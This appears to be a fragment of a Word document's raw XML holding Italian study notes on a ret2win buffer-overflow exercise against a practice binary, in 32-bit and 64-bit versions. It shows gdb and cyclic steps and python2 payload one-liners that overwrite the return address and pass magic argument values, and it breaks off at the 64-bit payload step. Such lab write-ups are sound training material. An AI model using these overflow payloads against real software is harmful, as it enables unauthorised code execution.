          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>04-ret2win_params:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   32 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA11CB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E896971" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-----&gt; SHELL1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F05F1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ file ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3CBFC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ checksec ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A56FCA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ ghidra -&gt; per analizzare un minimo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE9225" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ gdb ret2win_params </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F94F5C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cyclic 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6665EB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60DEFB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425731B4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Name: "Output_of_cyclic_200"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A9D3C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cyclic -l haaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660ECE47" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610C5E92" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Finding cyclic pattern of 4 bytes: b'haaa' (hex: 0x68616161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294ECA5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>Found at offset 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647351C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="44CD2B5E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ disassemble hacked --&gt; prendo il primo indirizzo che vedo elencato (ovvero 0x08049182)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0597D5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="079E8253" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>----&gt; SHELL2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA699D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>PAYLOAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2A678" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Il payload sembra essere così composto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A91BCA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python2 -c 'print "payload" + "hacked" + "return_address" + "param_1" + "param_2"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BF830" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8D212E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "AAAA" + "BBBB" + "CCCC"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543EB016" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F615AF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA9E50" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ gdb ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36881E55" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ disassemble register_name -&gt; prendo il return_address (0x0804922a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00705B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ break *0x0804922a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE325DA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ run &lt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B301163" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ n -&gt; finché non troviamo una comparazione (n sta per next)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17B9BD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ x $ebp + 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D5909" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>&gt;&gt; 0x42424242 --&gt; sarebbero le BBBB in hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D6BC9" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Visto che il cmp non va a buon fine non vedremo mai le CCCC ma andremo direttamente al return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6CDCBB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>perciò sostituiamo le BBBB con \xef\xbe\xad\xde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CBC2F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="46AC5780" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5B03A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "junk" + "\xef\xbe\xad\xde" + "CCCC"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B667C08" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B12C61" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900472C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ gdb ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB75D32" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ break *0x0804922a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F0489" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ run &lt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDA62E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ n -&gt; finché non troviamo una comparazione (n sta per next)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D0536" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ x $ebp + 0xc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD9B92" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>&gt;&gt; 0x43434343 --&gt; Sarebbero le CCCC in hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745F74C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="622CEE7B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5D6A6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "junk" + "\xef\xbe\xad\xde" + "\xbe\xba\xde\xc0"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C882B5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574B42E1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">----&gt; SHELL 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D518594" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./ret2win_params &lt; payload --&gt; fatto!</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>Notiamo che l'inidirizzo di ritorno non è</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E88C9" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>importante, ho messo junk giusto perchè sono 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005250FA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>byte che seppur invalidi rispettano la lunghezza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F94502" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="25D954CA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="1D96A360" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>04-ret2win_params:   64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706531F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AF9D6A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436941E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ gdb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD2DF8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cyclic 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C397296" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDC91F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; Name: "output_of_cyclic_100"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174981EE" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ cyclic -l gaaa (nel mio caso ho dovuto scrivere daaaaaaa e non gaaa) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A4EDD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Finding cyclic pattern of 8 bytes: b'daaaaaaa' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78807875" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>(hex: 0x6461616161616161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A0A3A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Found at offset 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787384C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ disassemble hacked --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t xml:space="preserve">prendo l'indirizzo di hacked </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>0x0000000000401142 e lo inverto a due a due</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987A4BD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x42\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C79425" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B0CBC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
